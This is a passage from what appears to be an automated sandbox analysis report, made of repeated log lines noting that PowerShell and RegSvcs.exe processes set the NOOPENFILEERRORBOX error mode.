                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
